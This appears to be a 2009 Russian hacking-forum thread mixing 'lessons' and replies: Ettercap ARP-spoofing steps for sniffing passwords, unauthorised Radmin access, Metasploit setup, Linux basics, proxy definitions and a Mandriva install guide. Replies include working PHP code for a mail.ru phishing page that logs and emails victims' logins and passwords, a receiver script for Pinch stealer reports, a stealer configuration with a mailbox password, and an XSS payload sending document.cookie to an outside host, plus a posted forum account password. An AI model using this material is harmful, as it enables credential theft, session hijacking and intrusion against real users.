Так вот просканировав сеть я обнаружил комп с открытым портом от Radmin`a я установил клиент Радмина и сидел получил полный доступ к этому компу....(вплоть до Рабочего стола)
Так же у nmap`a есть много настроек.....которые вы можете посмотреть через help. // nmap --help

Бывает так что времени нету или нет охоты.... на загрузку Виртуальной машины для единственной программы....допустим utorrent.....
Для этого случая у нас есть замечательная вещь как Wine(оно же вино)

Wine
Это мини эмулятор Windows XP под Linux .....
(скорее сказать что она эмулирует файловую систему)

sudo apt-get install wine

После чего у вас в Applications появится раздел Wine.....
Теперь для примера скачайте WinRAR и установите его....(это пожалуй первая нужная программа(имеется ввиду расширение) которая не потдерживается "менеджером архивов")

Ну и хакерскую программу которую должен иметь при себе Cracker это отладчик ollydbg даже если вы не знаете Ассемблер она всегда должна быть при вас....так как всегда есть вероятность что вы встретите Криса Касперски и он вам покажет пару трюков ^^
http://www.ollydbg.de/version2.html

Единственный недостаток из-за которого мы всё еще привязаны к Windows это то что Wine в некоторых случаях не может установить (корректно) программу.//Это в том случае если программа глобальная....как Word, Photoshop итд....хотя программа развивается....

Следующий и очень важный для нас инструмент будет Ettercap который мы можем установить из стандартного набора программ.....(кстати обратите внимание на него....там очень много полезных программ которые мы можем скачать)

Applications--Установка\Удаление--Интернет(и тут ищем программу Ettercap)--ставим галку напротив неё--Apply Changes

После этого эта программа будет установлена и мы сможем её найти в

Applications--Интернет

Запускаем её и с нас требуют пароль администратора....так как эта программа связанна с WiFi карточками.....

Ettercap

Эта программа производит ARP spoofing благодаря которому мы можем "ловить" пароли пролетающие в сети.....
Подробнее о ARP spoofing можно прочесть тут
http://ru.wikipedia.org/wiki/ARP-spoofing

А если коротко об этой атаке....то наш компьютер притворяется роутером....и все пакеты посылаются нам....после чего мы их декодируем.....(фильтруем то что нам нужно и сохраняем у себя...)и в это же время перенаправляем эти пакеты настоящему роутеру....(чтобы жертва не заметила подвоха)

именно эти действия выполняет Ettercap....
Теперь давайте рассмотрим как это можно сделать...
Открываем Ettercap(в графическом виде) и настраиваем его на атаку....

Sniff--Unifide Sniffing(выбираем интерфейс который подключен к сети которую будем атаковать , о как закрутил =D)
//p.s узнать какие у вас вообще есть интерфейсы можно набрав в консоли airmon-ng
У меня этот интерфейс eth1--ОК

Теперь нам нужно найти роутер и машины которые нам надо снифать.....

Hosts--Scan for hosts
Теперь открываем лист хостов....
Hosts--Hosts list
Роутеры обычно располагаются на таких адресах 192.16.1.1 или 192.168.1.254
или если админ продвинутый и поставил роутер на какой-то другой IP мы можем всегда воспользоваться nmap и вычислить это.....(если мы увидим что у кого то открыт 80 порт -порт http сервера...)
И так определили роутер....в моём случае он располагается 192.168.1.1 и добавляем его в Target 1 Все остальные машины добавляем в Target 2

Ну а теперь когда мы навели прицел на атакующих надо выбрать что нам нужно от них(снифаннье паролей или может чтобы не доходили до них пакеты...итд)
Делается это так...
Plugins--Manage the Plugins(и тут мы выбираем вид атаки....)
для того чтобы перехватывать пароли выбираем плагин pptp_pap
Жмём два раза на него....и он включается.....

Activating pptp_pap plugin...
pptp_pap: plugin running...

Но мы еще не начали атаку....теперь чтобы начать жмём
Mitm--ARP Poisoning(и ставим галку Sniff remote connections)--ok

Ну и наконец Start--Start Sniffing
Всё теперь сидим и ждём....наши пароли....кстати так же вы можете следить за пользователем....(куда он переходит по ссылкам) для этого вам надо включить еще один плагин remote_browser 1.2
Единственный недостаток этого плагина ...это если ссылка слишком большая то Ettercap сам делает своё окно на весь экран....и прикрыть его нельзя....

Ну и естественно имея Ubuntu как я могу не рассказать о такой фишке как
Compiz Fusion lcon
Это программа для улучшения твоего рабочего стола....
Но слово улучшение.....тут не уместно.....
Твой рабочий стол становится очень удобным и красивым....
В этот пакет входит такая фишка как 3D Descktop (тобишь куб)....и еще много много разных эффектов....
посмотреть которые вы можете тут
http://www.youtube.com/watch?v=ZxfSwzhS … re=related
Скачать эту программу можно с Applications--Установка\Удаление--(В поиске во всех программах вбиваетеCompiz)

Metasploit framework

Ну и наконец самая известная хакерская тулза.....это МЕТАСПЛОЙТ
Метасплойт представляет из себя огромную базу данных эксплойтов....которые, междупрочим можно запускать....указав всего несколько параметров.....этот инструмент я буду рассматривать отдельно....
Пока вам надо его установить....ну и при желании самим покапаться в нём.....

В терминале набираем.....
sudo apt-get install ruby libruby rdoc
apt-get install libyaml-ruby
apt-get install libzlib-ruby
apt-get install libopenssl-ruby
apt-get install libdl-ruby
apt-get install libreadline-ruby
apt-get install libiconv-ruby
apt-get install rubygems *
apt-get install libgtk2-ruby libglade2-ruby

Естественно это каждая команда по отдельности.....
После чего вам надо скачать сам пакет.....
http://metasploit.com/framework/downloa … 3.2.tar.gz
Разархивировать..... и всё.... Metasploit установлен....

Ну и совсем уж напоследок.....раскажу парочку фишек....для новичков в Linux
1)Команда su  в терминали означает что ты хочешь все остальные операции(в терминале) производить от пользователя root
как пример это делается для того чтобы несколько раз не писать sudo....
2)Команда top это просмотр выполнения процессов....(аналог в Windows Ctrl+alt+del)
3)Команда kill (номер PID) это убивает процесс...допустим firefox заглючила....и не хочет отключаться....
открываешь командную строку....в ней пишешь top (там ищешь PID firefox`a) (останавливаешь командуtop....нажав ctrl+C //кстати так можно делать со всеми командави....допустим ping точно так же можно остановить...)
И узнав номер PID firefox`a который равнялся 39994 мы убиваем этот процесс
kill 39994  .
4)Команда cd (передвижение по деррикториям)
5)Команда chmod служит для раставления прав.....
допустим какой то файл или папка доступна только root...а мы хотим сделать его\её доступным для всех....(записи и чтения)

sudo chmod 777 '/var/lol/somefile_or_dir'

6)Команда rm (remove) переводится как удаление.....что бы это могло быть? =)
Пример
rm '/var/lol/somefile.x'

7)Команда history используется для просмотра всего...что вбивалось в командную строку....ох весёлая история была у меня с этой командой...

8)Удаление программы
Пример: sudo apt-get remove aircrack-ng

Помните...если вы не знаете что означает та или иная команда ....вы можете всегда посомтреть.....
sudo --help
rm --help
ping --help
итд......
иногда может быть так
man man
man help
man ping ......

Вывод

И так мы с вами узнали
1)Какой инструментарий используется при нападении.
2)Поняли на сколько лёгок Linux в изучении....и насколько легко устанавливать различные известные пакеты...
3)Узнали\Повторили несколько команд из терминала...
4)Поняли как работают репозитарии
5)Рассмотрели такой вид атаки как ARP spoofing
6)И наконец собрали себе боеспособную ОС.

___________________________________________________________________________
Очень бы хотелось чтобы вы смогли на практике проделать всё что я описал.....так как практика это саоме ценное... может быть что с первого раза может всё не получиться .....но уверен что получиться!
Во всяком случае старайтесь сидеть под Ubuntu когда вы в ICQ или сёрфать.....
старайтесь использовать WIndows только в том случае если вам надо напечатать документ....и нужного драйвера нету...или для игры в CS (для игр в целом........вероятность потери паролей сокращается с 88% до 8% =)

__________________________________________________________________________________________
Надеюсь что вы узнаете что то новое из этого Урока или повторите то что забыли.....
Удачи!

< Сообщение отредактировано Xakep9009 -- 16.02.2009 2:09:49 >

Прокси-сервер — служба в компьютерных сетях, позволяющая клиентам выполнять косвенные запросы к другим сетевым службам. Сначала клиент подключается к прокси-серверу и запрашивает какой-либо ресурс (например, e-mail), расположенный на другом сервере. Затем прокси-сервер либо подключается к указанному серверу и получает ресурс у него, либо возвращает ресурс из собственного кеша (в случаях, если прокси имеет свой кеш). В некоторых случаях запрос клиента или ответ сервера может быть изменён прокси-сервером в определённых целях. Также прокси-сервер позволяет защищать клиентский компьютер от некоторых сетевых атак.

Использование

Чаще всего прокси-серверы применяются для следующих целей:
Обеспечение доступа с компьютеров локальной сети в Интернет.
Кеширование данных: если часто происходят обращения к одним и тем же внешним ресурсам, то можно держать их копию на прокси-сервере и выдавать по запросу, снижая тем самым нагрузку на канал во внешнюю сеть и ускоряя получение клиентом запрошенной информации.
Сжатие данных: прокси-сервер загружает информацию из Интернета и передаёт информацию конечному пользователю в сжатом виде. Такие прокси-серверы используются в основном с целью экономии внешнего трафика.
Защита локальной сети от внешнего доступа: например, можно настроить прокси-сервер так, что локальные компьютеры будут обращаться к внешним ресурсам только через него, а внешние компьютеры не смогут обращаться к локальным вообще (они «видят» только прокси-сервер). См. также NAT.
Ограничение доступа из локальной сети к внешней: например, можно запретить доступ к определённым веб-сайтам, ограничить использование интернета каким-то локальным пользователям, устанавливать квоты на трафик или полосу пропускания, фильтровать рекламу и вирусы.
Анонимизация доступа к различным ресурсам. Прокси-сервер может скрывать сведения об источнике запроса или пользователе. В таком случае целевой сервер видит лишь информацию о прокси-сервере, например, IP-адрес, но не имеет возможности определить истинный источник запроса. Существуют также искажающие прокси-серверы, которые передают целевому серверу ложную информацию об истинном пользователе.

Классификация прокси

Существует несколько разновидностей прокси, главным отличием которых являются выполняемые функции:
HTTP/HTTPS proxy – наиболее распространённый тип прокси серверов, который зачастую имеет 80, 8080, 3128 номер порта. HTTP прокси делятся уровнем анонимности на: прозрачные (не скрывают реальный IP адрес клиента), анонимные (указывают на то, что используется прокси, но не выдают реальный IP адрес клиента), искажающие (искажают IP адрес клиента), элитные прокси (не указывают на то, что используется прокси сервер, скрывают реальный IP адрес клиента).
SOCKS proxy – прокси сервер передающий абсолютно все данные от клиента к серверу, не изменяя и не добавляя ничего. С точки зрения web-сервера SOCKS proxy является клиентом, т.е. SOCKS proxy анонимны по определению. Имеет подтипы SOCKS4, SOCKS4a, SOCKS5. Чаще всего SOCKS proxy имеют 1080, 1081 номер порта.
FTP proxy – прокси сервер, предназначенный для работы с файловыми менеджерами.
CGI proxy или Anonymizer - web-страницы, которые позволяют осуществлять анонимный переход с одной web-страницы на другую. Для использования данного типа прокси не надо менять настройки браузера, достаточно перед адресом страницы, но которую вы собираетесь перейти указать адрес анонимайзера.

Проверка анонимности прокси

№1
№2

Где искать прокси?

Proxy Finder Enterprise
Описание: Многим из нас время от времени нужны живые свежие прокси. Вот поиском таких проксей и занимается небольшая утилита Proxy Finder Enterprise . Программа ведет поиск по сотням специализированных сайтов и форумов. За несколько секунд Proxy Finder Enterprise способен сгенерировать список с 10000+ уникальных прокси-серверов. Очень проста в использовании. По завершении поиска нажимаем на Save и прога сохраняет все найденные прокси сервера в блокнот!

=== СКАЧАТЬ ===

Спасибо большое за уроки! Xakep9009
Особено за Урок 13. Создаём собственный фейк!
Все зделал правильно
Но как лень было постояно заходить на хост и проверять кто повелся на мой фейк
и решил что прикольно было еслиб логины и пароли сами приходили мне на мыло)
Вот что получилось
(P.S фейк делал на wwwmail.ru)
_____________________________________________________
создаём файл conf.ini с таким содержанием:

<?php
$link=" http://cards.mail.ru/card2blog.html?tid=417"; // куда пошлем usera после авторизации
$showerrlink="on";
$errlink=" http://mail.cards.tu2.ru"; // куда пошлем если он не в вел нечего а тупо нажал
$mailsend="on"; // вкл. отправку сообщения
$mailaddress="твое мыло@mail.ru";
?>

после создаём файл log.php с таким содержанием:

<?php

include "conf.ini";
$time=date("d.m.Y H : i"); //дата и время
$in_ip=@$_SERVER['HTTP_X_FORWARDED_FOR']; // ip адрес
$ip=$_SERVER['REMOTE_ADDR']; // откуда пришол
$otherinf=getenv("HTTP_USER_AGENT"); //Браузер
$ref=getenv('HTTP_REFERER');
if(!$ref)
{$reftext="<b>Пришел из: </b>Родной URL.";}
else
{$reftext="<b>Пришел из: </b>".$ref;}
$password=$_POST['Password']; //Пароль
$login=$_POST['Login']; //логин
$Domain = $_POST['Domain']; //домен
$linklog="";
if($showerrlink=="on")
{
if(!$password or !$login){$tolink=$errlink;} else {$tolink=$link;}
}
else
{$tolink=$link;}
$log=fopen('base.html','a+'); // открываем хранишище
if($log)
{
fwrite($log, "<hr color='#999999'>" ."<br>"); //запись
fwrite($log, "<b>Дата: </b>".$time."<br>");
fwrite($log, "<b>Внешний IP: </b>".$ip."<br>");
fwrite($log, "<b>Внутренний IP: </b>".$in_ip."<br>");
fwrite($log, "<b>Броузер: </b>".$otherinf."<br>");
fwrite($log, $reftext."<br>");
fwrite($log, "<b>Перекинуло на: </b>".$tolink."<br>");
fwrite($log, "<b>Логин: </b>".$login."<br>");
fwrite($log, "<b>Пароль: </b>".$password."<br>");
fwrite($log, "<hr color='#999999'>" . "<br>");
}
fclose($log); // закрываем
if($mailsend=="on")
{
$mailto=$mailaddress; //
$mailfrom="From: GreShniK <log@unifake.ru>"."\nContent-type: text/html; charset=windows-1251\n";
$subj="Произведена запись";
$mtext=" <font size='3'>[ ".$time." ] User НАЙДЕН.</font><br>"."<b>IP: </b>.".$ip.".<br>".$reftext."<br><b>Броузер: </b>".$otherinf."<br><b>Логин: </b>".$login."<br><b>Пароль: </b>".$password."<br><b>Домен: </b>".$Domain."<br><hr color='#999999'>" . "<b>GreShniK6_6_6</b>";
@mail($mailto, $subj, $mtext, $mailfrom);
}
header("Location: ".$tolink."");
?>

теперь создаём файл base.html //с пустым содержанием.

и создаём страничку фейка index.html

открываем "Исходный текст" жмем "Правка", затем жмем "Выделить все" опять жмем "Правка" и "Копировать". открываем Блокнот и жмем Ctrl+V текст в блокноте. приступим к его редактированию. Нам необходимо найти следующую строку:
Код:
<form method="post" action="auth" onSubmit="return CheckForm(this);">
и заменить
на

Код:
<form method="post" action="log.php" onSubmit="return CheckForm(this);">

И стираем три строки кода:

Код:
<input type="hidden" name="page" value="">

<input type="hidden" name="post" value="">

<input type="hidden" name="login_from" value="">

Теперь сохраняем файл с именем index.html
Заливаем на хост и ставим права на файлы conf.ini и log.php права 755 а на файлу base.html 777

Все
?
//CFG
$mode = 2; //1.Send to e-mail, 2.Save to file, 3.E-mail+file
$rndatch = FALSE; //Random reports names
$savetodir = FALSE; //Save rerorts to changed directory
$dirname = "images"; //Directory name

// a - recepient
// b - subject
// c - message body
// d - file name(not *.php)

//Getting data
$ip=getenv("REMOTE_ADDR");
$email=$_POST['a'];
$subject=$_POST['b']."(".$ip.")";
$msg = str_replace(" ","+",$_POST['c']);
$var = $_POST['d'];

//Storing || Sending data
//via E-Mail
IF($mode == 1 || $mode == 3){

IF($rndatch){
$array = range('a','z');
$c=count($array);
$var = $array[rand(1,$c)] . $array[rand(1,$c)] . $array[rand(1,$c)] . $array[rand(1,$c)] . rand(0,9) . rand(0,9) . ".bin";
};

$headers = "Content-Type: application/octet-stream; name=\"".$var."\"\n";
$headers.= "Content-Transfer-Encoding: base64\n";
$headers.= "Content-Disposition: attachment; filename=\"".$var."\"\n";
mail($email, $subject, $msg, $headers);
};

//via File
IF($mode == 2 || $mode == 3){

//To dir
IF($savetodir){
// @mkdir($dirname);
@chdir($dirname);
}

//$vartype=substr($var,-3,3);
// IF($vartype == "php")
$var.=".rep";

$filename = $ip.".php";

$fp=fopen($filename,'w');
fwrite($fp, base64_decode($msg));
fclose($fp);
};
?>

<title>ret_ok</title>

облазил весь инет   хотел написать лично Хакеру 9009  но у него к сожалению переполнена папка с личными сообщениями, поэтому пишу здесь... вообщем проблема с Backtrack -ером.  Он не видит мою сетевуху Marvell Yukon/  при наборе команды airmon-ng  выдается шляпа

bt ~ # airmon-ng

Interface Chipset Driver

bt ~ # iwconfig
lo no wireless extensions.

eth0 no wireless extensions.

bt ~ # lo

bt ~ # ifconfig -a
eth0 Link encap:Ethernet HWaddr 00:13:77:AA:9F:E7
UP BROADCAST NOTRAILERS MULTICAST MTU:1500 Metric:1
RX packets:0 errors:0 dropped:0 overruns:0 frame:0
TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:0 (0.0   TX bytes:0 (0.0   
Interrupt:19

lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
UP LOOPBACK RUNNING MTU:16436 Metric:1
RX packets:0 errors:0 dropped:0 overruns:0 frame:0
TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:0 (0.0   TX bytes:0 (0.0   
как я понял  нету дров для  сетевухи... ок   скачал с офф сайта дрова  для линукса, помучелся часик  установил таки  эти дрова 

вроде по отчету  все встало -
Disconnect alternative devices:  (done)                                                     [   OK   ]
Unload alternative driver (done)                                                            [   OK   ]
Create tmp dir (/tmp/Sk98IhnYrorkRoQNKEEjULXWb)                                             [   OK   ]
Check user id (0)                                                                           [   OK   ]
Check kernel version (2.6.21.5)                                                             [   OK   ]
Check kernel symbol file (/proc/kallsyms)                                                   [   OK   ]
Check kernel type (SMP)                                                                     [   OK   ]
Check number of CPUs (2)                                                                    [   OK   ]
Check architecture (found)                                                                  [   OK   ]
Set architecture (i386)                                                                     [   OK   ]
Check compiler (/usr/bin/gcc)                                                               [   OK   ]
Check mcmodel flags (none)                                                                  [   OK   ]
Check module support (/sbin/insmod)                                                         [   OK   ]
Check make (/usr/bin/make)                                                                  [   OK   ]
Check kernel gcc version (4.1.2) (Kernel:4.1.2 == gcc:4.1.2)                                [   OK   ]
Check sk98lin driver availability (not loaded)                                              [   OK   ]
Check kernel header files (/usr/src/linux-2.6.21.5)                                         [   OK   ]
Check sources for .config file (/usr/src/linux-2.6.21.5/.config)                            [   OK   ]
Copying file from proc directory (done)                                                     [   OK   ]
Copy and check .config file (done)                                                          [   OK   ]
Check the mem address space (highmem)                                                       [   OK   ]
Change IOMMU (disabled)                                                                     [   OK   ]
Create new .config file (done)                                                              [   OK   ]
Execute: make oldconfig (done)                                                              [   OK   ]
Check modpost availability (available)                                                      [   OK   ]
Unpack the sources (done)                                                                   [   OK   ]
Check firmware availability (not available)                                                 [   OK   ]
Check kernel header version (Kernel:2.6.21.5 == Header:2.6.21.5)                            [   OK   ]
Check kernel functions (Changed: nothing)                                                   [   OK   ]
Compile the kernel (done)                                                                   [   OK   ]
Copy driver man page into /usr/share/man/man4/ (done)                                       [   OK   ]
Check the driver (done)                                                                     [   OK   ]
Delete old driver (done)                                                                    [   OK   ]
Copying driver (done)                                                                       [   OK   ]
Change /etc/modprobe.conf (done)                                                            [   OK   ]
Delete alternative driver (done)                                                            [   OK   ]
Make dependency (done)                                                                      [   OK   ]
Delete temp directories (done)                                                              [   OK   ]
All done. Driver installed and loaded.
To load the module manually, proceed as follows:
    Enter "modprobe sk98lin"

да вот только всеравно  карточку он не видет..  в чем проблема... кто может подсказать ?  может я что то не так делаю ?
Backtrack - скачен на флэшку
ноутбук - samsung r560
1-IP:

IP-адрес (IP, ай-пи или айпишник) – это сокращение от английского Internet Protocol Address, то есть уникальный идентификатор компьютера, подключенного к Интернету. IP-адрес по разным версиям представляет собой двоичное число 32 или 128 бит. Форма IP-адреса – запись в виде четырех десятичных чисел, от 0 до 255. Числа разделяются точками. IP-адрес назначается администратором во время конфигурирования компьютеров и маршрутизаторов. Каждый порт маршрутизатора имеет собственный IP-адрес. То есть IP-адрес характеризует не отдельный компьютер или маршрутизатор, а одно сетевое соединение.
http://chtotakoe.info/articles/ip-adres_183.html
_________________________________________________________________

2)MAC
Это уникальный шестнадцатиричный серийный номер, назначаемый каждому сетевому устройству Ethernet, для идентификации его в сети. Для сетевых устройств (так же как и для большинства других сетевых типов) этот адрес (permanently) устанавливается во время изготовления, хотя обычно, он может быть изменен при помощи соответствующей (программы).
http://www.gven.ru/faq/10.html
_____________________________________________________________________

3)TCP/IP
TCP/IP - это средство для обмена информацией между компьютерами, объединенными в сеть. Не имеет значения, составляют ли они часть одной и той же сети или подключены к отдельным сетям. Не играет роли и то, что один из них может быть компьютером Cray, а другой Macintosh. TCP/IP - это не зависящий от платформы стандарт, который перекидывает мосты через пропасть, лежащую между разнородными компьютерами, операционными системами и сетями. Это протокол, который глобально управляет Internet, и в значительной мере благодаря сети TCP/IP завоевал свою популярность.
http://www.codenet.ru/webmast/tcpip.php
_______________________________________________________________________
4)FTP
FTP (ftp) – это протокол передачи файлов. Программы, использущие этот протокол, стали частью отдельного сервиса Интернет. Для пользования FTP нужна специальная программа – FTP-клиент. FTP-клиентом может стать, например, Интернет-броузер или программа управления файлами FAR. FTP – это аббревиатура, означающая File Transfer Protocol (в переводе с английского это и есть протокол передачи файлов). От HTTP FTP отличается тем, что применяется для передачи файлов произвольного размера. Сегодня уже все операционные системы включают FTP-клиент для работы в командной строке.
http://chtotakoe.info/articles/ftp_43.html
___________________________________________________________________________
5)Telnet
Telnet - это однин из старейших протоколов Internet. Оно появилось в 1969 году в ARPANET. Имя этого протокола является сокращением от "сетевой коммуникационный протокол" - telecommmunications network protocol. Его описание находиться в RFC 854. Этот протокол позволяет вам подсоединиться к удаленному компьютеру, находящемуся в сети, и работать с ним как будто бы вы работаете на удаленном компьютере. То есть в режиме терминала. Ваши возможности лимитируются тем уровнем доступа, которым задан для вас администратором удаленной системы.
В поставку Windows входит одноименная программа, которую Вы можете запустить через Пуск - Выполнить.
Появиться окно программы и Вы можете установить связь с удаленной системой.
http://www.firststeps.ru/msoffice/win/r.php?45
____________________________________________________________________________________
6)Proxy- Это посредние между моим компьютером и Интернетом.
Proxy-сервер может многое. Он способен:
ускорить Вашу работу с Internet;
сделать Ваше путешествие по Сети анониным;
позволить входить в чаты, даже если Вас заблокировали;
помочь посмотреть те сайты, к которым закрыл доступ Ваш системный администратор;
и многое другое.
____________________________________________________________________________
7)Socks- аналогичен прокси серверу НО У использования протокола Socks есть ряд преимуществ перед применением прокси-серверов. Во-первых, такое решение позволяет гарантировать анонимность конечного пользователя. И действительно, передача IP-адреса удаленного компьютера в принципе не предусмотрена этой технологией. Более того, socks-сервер в отличие от прокси-сервера не занимается преобразованием заголовков HTTP-пакетов, он создает их сам от себя. А поэтому удаленные компьютеры не могут определить, кому пересылают информацию - ПК конечного пользователя или же специальному сервису.
http://www.compdoc.ru/network/internet/what_is_socks/
________________________________________________________________________________

8)Shell
shell — оболочка) — интерпретатор команд операционной системы (ОС), обеспечивающий интерфейс для взаимодействия пользователя с функциями системы.
c Википедии
______________________________________________________________________

0

7

9)Port-Интерфейс для подключения линий приема-передачи данных к сетевому устройству, например, компьютеру или концентратору - 2. Физический или логический адрес устройства или процесса внутри компьютера. Иногда при обращении к компьютеру в Internet за определенной услугой, после его адреса надо через двоеточие указать номер порта

80:HTTP - Протокол передачи гипертекста.Именно с этим протоколом ты встречаешься каждый день в интернете лазия по сайтам...

21:FTP (File Transfer Protocol) - служит для передачи файлов
_______________________________________________________________________
10)Отличие между Trojan и Virus

Вирус — это компьютерная программа, которая способна создавать копии своего кода (причем, не всегда совпадающие с оригинальным) и внедрять его в код других программ, системные области компьютера и компьютерных сетей. Вирусы также могут осуществлять и другие вредоносные действия. Каждая копия вирусного кода также способна к дальнейшему распространению.

Троян (троянский конь). К данному типу вредоносных программ относятся программы, которые преследуют своей целью вредоносное воздействие по отношению к компьютерной системе. Трояны, как правило, не имеют механизма создания копий своего кода.

______________________________________________________________________

11)DNS
DNS (англ. Domain Name System — система доменных имён) — распределённая система (распределённая база данных), способная по запросу, содержащему доменное имя хоста (компьютера или другого сетевого устройства), сообщить IP адрес или (в зависимости от запроса) другую информацию. DNS работает в сетях TCP/IP. Как частный случай, DNS может хранить и обрабатывать и обратные запросы, определения имени хоста по его IP адресу: IP адрес по определённому правилу преобразуется в доменное имя, и посылается запрос на информацию типа "PTR"._

_DNS была разработана для именования машин в глобальной сети. Основной особенностью глобальной сети является распределенное администрирование, когда один администратор физически не может уследить за выделением имен. Поэтому Служба Доменных Имен функционирует на принципе делегирования полномочий. Каждая машина либо знает ответ на вопрос, либо знает кого спросить. При правильном функционировании система замкнута, т.е. если запрошенная информация имеется у кого-либо, то она будет найдена и сообщена клиенту, либо, если вопрос не имеет ответа, клиент получит сообщение о невозможности получения ответа на вопрос.
_____________________________________________________________________________

12)Тунэль , Тунэлирование

Туннелирование в компьютерных сетях — это метод построения сетей, при котором один сетевой протокол инкапсулируется в другой. От обычных многоуровневых сетевых моделей (таких как OSI или TCP/IP) туннелирование отличается тем, что инкапсулируемый протокол относится к тому же или более низкому уровню, чем используемый в качестве тоннеля.

Туннелирование обычно применяется для согласования транспортных протоколов либо для создания защищённого соединения между узлами сети.

Туннель может быть использован, когда две сети с одной транспортной технологией необходимо соединить через сеть, использующую другую транспортную технологию. При этом пограничные маршрутизаторы, которые подключают объединяемые сети к транзитной, упаковывают пакеты транспортного протокола объединяемых сетей в пакеты транспортного протокола транзитной сети. Второй пограничный маршрутизатор выполняет обратную операцию.

Обычно туннелирование приводит к более простым и быстрым решениям по сравнению с трансляцией, так как решает более частную задачу, не обеспечивая взаимодействия с узлами транзитной сети.

Здарова всем учащимся. Я хочу написать по поводу пинча, для тех, у кого не получается заюзать правильно эту прогу.
Я начал изучать уроки многоуважаемого Хакер9009 2-недели назад(у меня просто времени мало, в универ надо готовится). И только сегодня смог правильно понять пинч. Я спрашивал у форумчан, но никто внятно не объяснил. Пришлось экспериментировать. Не знаю как у кого получилось, но у меня получилось отправить отчет только себе на мейл от своего же мейла:
Sender
• E-Mail: akromnet2@rambler.ru //это мой мейл
• SMTP Server: smtp.rambler.ru
• User: akromnet2 /* обязательно пишем то что прописано до "@rambler.ru" т.е. akromnet2(если введете, допустим akromnet; user и т. п. то отчет отправлятся не будет */
• Password: hugemoney // это пароль от моего мейла(akromnet2@rambler.ru)

Receiver
• E-Mail: akromnet2@rambler.ru // я пробывал писать и другие свои и-мейлы но отчет не отправлялся
• Subject: report_from_pinch // тема письма к-рое будет отправлено вам на мейл
• File name: system_info.bin // название файла отчета

Я наверно перепробовал всевозможные варианты, а получилось только по вышенаписанному. С парсером проблемы были но я исправил. А что касается джойнера, то 2-недели назад он не палился Авастом, зато Каспер палил(многие варианты перепробовал).

Что касается XSS, то можете поэкспериментировать с 1150.ucoz.ru (у меня с 1-го разу получилось). У меня на shurem.ru ничего не получалось(а именно с полем Сведения). Потом я нашел пароль к акку Хакер9009(акк: qwerty ; пароль: qwerty) и просто скопировал оттуда его запись. И все получилось. В коде <sсriрt>img = new Image(); img.src = "http://old.antichat.ru/cgi-bin/s.jpg?"+document.cookie;</sсriрt> ЗАМЕТЬТЕ -> вопросик это не опечатка Хакера9009!!!

Вопросы: Должен ли Tor скрывать мой IP адрес? //потому что мой АйПи не изменился когда я заюзал Tor но мою страну не определили
Для проверки IP нажмите сюда

< Сообщение отредактировано ReM_SAD -- 04.03.2009 2:41:43 >
УРОК №1 ПО ЛИНУКСУ ДЛЯ НАЧИНАЮЩИХ
Линукс для начинающих (дистрибутив Mandriva 2009 Free)

1.    Подготовка к установке.
Первым делом нам понадобиться чистый DVD диск и записать скачанный дистрибутив.
Сам дистрибутив можно скачать здесь
ftp://ftp.mandriva.ru/mandriva/official … d-i586.iso
Дистрибутив очень прост в использовании и максимально упрощён + очень похож на винду.
Как только Вы скачали дистрибутив и записали на DVD диск, то приступаем к следующему пункту.
2.    Установка Линукс.
Загружаемся с DVD диска и нам появляется загрузочное меню.
Навигация меню не сложная. В самом низу вы увидите следующее «F1 Help (помощ)» «F2 Language (язык)» «F3 Other Options (Другие параметры)». Для удобства, кто не знает английский, жмём «F2» и выбираем «русский» язык. Далее можно нажать «F3» для настройки расширения видео, нужно ещё раз нажать «F3» и выпадет список выбора расширения видео, в нашем случае выбираем то что нам нужно, я например выбрал «1024x768».
По середине экрана мы видим выбор загрузки, передвигаться по этому меню можно нажатием кнопок вверх, вниз:
•         Boot from Hard Disk (загрузка с винчестера, т.е. пропустить установку)
•         Install Mandriva Linux 2009 (установка дистрибутива)
•         Rescue System (восстановление системы)
•         Memory Test (тест оперативной памяти)
Нам конечно нужен пунк 2 установка дистрибутива.
Выбираем и поехали…
После загрузки установщика предлагается выбрать язык, выбираем «русский» (если хотите выбрать другие языки то вперёд). Нажимаем далее.
Появляется лицензионного соглашение, мы конечно принимаем его и жмём «Далее».
Далее нам предлагают уточнить тип установки, это обновление старого дистрибутива линукс или новая установка, выбираем конечно же «новая установка» и жмём «Далее».
На этом этапе предлагается выбрать раскладку клавиатуры, мы нажимаем кнопку «Больше» и выбираем раскладку «US клавиатура», нажимаем «ОК» затем «Далее».
Теперь у нас спрашивают, как мы будем разбивать винчестер, есть три варианта:
- Использовать существующие разделы
- Очистить и использовать весь диск
- Ручная разметка диска
Вот здесь нужно быть очень аккуратным, лучше всего в первый раз для теста и тренировок подключить чистый винчестер, а все другие отключить, что бы не потерять данные, при случайном или ошибочном уничтожении или очистки всех разделов винта.
Мы предполагаем, что на компьютере нет никакой другой операционной системы и на винчестере нет никаких данных. А для того что бы ничего не потерять я предлагаю испробовать на виртуальной машине, к счастью выбор большой: VMWare, Virtual PC, VirtualBox(советую).
Выбираем пункт «Очистить и использовать весь диск», теперь у нас появляется предупреждение такого рода: «ВСЕ существующие разделы и данные на них будут потеряны на диске sda и показывает размер винчестера в скобках и его тип.
Примечание: в операционной системе линукс винчестеры маркируются следующим видом:
первый винчестер – sda
второй винчестер – sdb
третий винчестер – sdc
четвёртый винчестер – sdd
и так далее…
Нажимаем кнопку «Далее».
Следующим шагом будет предложение скопировать весь DVD диск на винчестер и потом с него устанавливать, это полезно если вы захотите всё время ставить какие-то пакеты, а потом удалять, и что бы не вставлять DVD диск с дистрибутивом установщик пакетов просто будет брать с винчестера, оставляю вам сделать выбор, но помните место на винчестере выжрет около 4.8 Гиг.(ведь целый DVD диск). Выбираем и двигаемся далее.
Дальше появиться просьба выбрать «Есть ли дополнительный носитель для настройки?» - это меня нужно если у вас будет установка производиться с другого привода или по установка по сети, в нашем случае выбираем «Отсутствует».
Так далее выбор рабочего стола, мы выбираем KDE и жмём “Далее».
Теперь пошла установка дистрибутива, это займёт около 20-60 минут в зависимости какой у вас компьютер.
После установки установщик запрашивает ввести главный пароль администратора (root) и создать нового пользователя (пользователь нужен для основной работы, а учётная запись администратора лучше использовать временно для установки программ).
После того как ввели пароль root и ввели данные с паролем для нового пользователя нажимаем «Далее». Следующий шаг, выбрать куда установить начальный загрузчик. Т.к. у нас винчестер чистый и там не было ни одной операционной системы мы указываем ставить в «Первый сектор диска MBR», и опять жмём «Далее».
